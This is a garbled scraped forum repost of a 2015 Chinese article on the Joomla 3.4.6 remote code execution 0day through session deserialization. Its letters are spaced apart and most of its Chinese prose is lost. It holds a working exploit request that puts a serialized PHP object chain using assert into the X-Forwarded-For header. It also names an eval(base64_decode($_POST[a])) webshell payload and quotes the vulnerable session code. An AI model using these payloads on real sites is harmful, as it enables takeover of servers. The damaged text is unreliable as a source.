[26578] 2015-12-17_又一高危0day漏洞,你的网站中招了吗?

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-19
2015-12-17_又一高危0day漏洞,你的网站中招了吗?   0 d a y     m o o n s e c   2 0 1 5 - 1 2 - 1 7 J o o m l a 0 d a y 线 线 , J o o m l a   0 d a y   J o o m l a J o o m l a 使 P H P M y S Q L L i n u x   W i n d o w s M a c O S X 0 d a y   ( ) ,   0 d a y   J o o m l a   J o o m l a   3 . 4 . 6     0 d a y     1 . 5     3 . 4 . 5   P H P 1 6 I P 使 1 0 0 0   J o o m l a   使 p a y l o a d   e v a l ( b a s e 6 4 _ d e c o d e ( $ _ p o s t [ a ] ) )   使 p a y l o a d   p h p i n f o ( ) ;     m d 5 ( 2 3 3 3 3 3 ) ;   J o o m l a   3 . 4 . 6 j o o m l a 1   J o o m l a     c o n f i g u r a t i o n . p h p     $ s e s s i o n _ h a n d l e r   n o n e s e s s i o n
2   P H P     5 . 6 . 1 3     3   J o o m l a   3 . 4 . 6       U s e r - A g e n t     X - F o r w a r d e d - F o r   c o o k i e c o o k i e c o o k i e G E T   /   H T T P / 1 . 1 H o s t :   1 2 7 . 0 . 0 . 1 X - F o r w a r d e d - F o r : } _ _ t e s t | O : 2 1 : " J D a t a b a s e D r i v e r M y s q l i " : 3 : { s : 2 : " f c " ; O : 1 7 : " J S i m p l e p i e F a c t o r y " : 0 : { } s : 2 1 : " 0 0 0 d i s c o n n e c t H a n d l e r s " ; a : 1 : { i : 0 ; a : 2 : { i : 0 ; O : 9 : " S i m p l e P i e " : 5 : { s : 8 : " s a n i t i z e " ; O : 2 0 : " J D a t a b a s e D r i v e r M y s q l " : 0 : { } s : 8 : " f e e d _ u r l " ; s : 3 7 : " p h p i n f o ( ) ; J F a c t o r y : : g e t C o n f i g ( ) ; e x i t ; " ; s : 1 9 : " c a c h e _ n a m e _ f u n c t i o n " ; s : 6 : " a s s e r t " ; s : 5 : " c a c h e " ; b : 1 ; s : 1 1 : " c a c h e _ c l a s s " ; O : 2 0 : " J D a t a b a s e D r i v e r M y s q l " : 0 : { } } i : 1 ; s : 4 : " i n i t " ; } } s : 1 3 : " 0 0 0 c o n n e c t i o n " ; b : 1 ; } ð C o o k i e :   3 3 4 2 5 1 4 d d e 1 4 3 a 0 4 d a d 9 5 8 b 2 e b 5 a 7 4 8 a = p d 4 n n q l p s 2 s u k 9 r 7 0 1 8 9 j k p d n 2 G E T   /   H T T P / 1 . 1 H o s t :   1 2 7 . 0 . 0 . 1 C o o k i e : 3 3 4 2 5 1 4 d d e 1 4 3 a 0 4 d a d 9 5 8 b 2 e b 5 a 7 4 8 a = p d 4 n n q l p s 2 s u k 9 r 7 0 1 8 9 j k p d n 2 p h p i n f o ( ) l i b r a r i e s / j o o m l a / s e s s i o n / s e s s i o n . p h p j o o m l a H T T P _ U S E R _ A G E N T H T T P _ X _ F O R W A R D E D _ F O R s e s s i o n / /   R e c o r d   p r o x y   f o r w a r d e d   f o r   i n   t h e s e s s i o n   i n   c a s e   w e   n e e d   i t   l a t e r i f ( i s s e t ( $ _ S E R V E R [ ' H T T P _ X _ F O R W A R D E D _ F O R ' ] ) ) { $ t h i s - > s e t ( ' s e s s i o n . c l i e n t . f o r w a r d e d ' , $ _ S E R V E R [ ' H T T P _ X _ F O R W A R D E D _ F O R ' ] ) ; / /   C h e c k f o r   c l i e n t s   b r o w s e r i f ( i n _ a r r a y ( ' f i x _ b r o w s e r ' ,   $ t h i s - > _ s e c u r i t y )   & & i s s e t ( $ _ S E R V E R [ ' H T T P _ U S E R _ A G E N T ' ] ) ) { $ b r o w s e r   = $ t h i s - > g e t ( ' s e s s i o n . c l i e n t . b r o w s e r ' ) ; i f   ( $ b r o w s e r   = = =   n u l l ) { $ t h i s - > s e t ( ' s e s s i o n . c l i e n t . b r o w s e r ' , $ _ S E R V E R [ ' H T T P _ U S E R _ A G E N T ' ] ) ; } } j o o m l a s e s s i o n   / l i b r a r i e s / j o o m l a / s e s s i o n / s t o r a g e . p h p   J S e s s i o n S t o r a g e  
s e s s i o n _ s e t _ s a v e _ h a n d l e r   s e s s i o n   r e a d ( ) w r i t e ( ) p h p r e a d ( ) w r i t e ( ) P H P r e a d ( ) w r i t e ( ) l i b r a r i e s / j o o m l a / s e s s i o n / s t o r a g e s e s s i o n j o o m l a   s e s s i o n   v a l u e   j o o m l a 使   s e s s i o n   e x p   M y s q l   r e a d ( )   P H P P H P   < =   5 . 6 . 1 3 s e s s i o n . c l i e n t . f o r w a r d e d C h e c k p h p _ v a r _ u n s e r i a l i z e 退 f a l s e P H P p h p _ v a r _ u n s e r i a l i z e k e y - v a l u e k e y - v a l u e P H P " | " k e y - v a l u e p h p s e s s i o n b u g m y s q l 使 s e s s i o n   M y s q l   j o o m l a c o n f i g u r a t i o n . p h p $ s e s s i o n _ h a n d l e r   n o n e 使 s e s s i o n
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则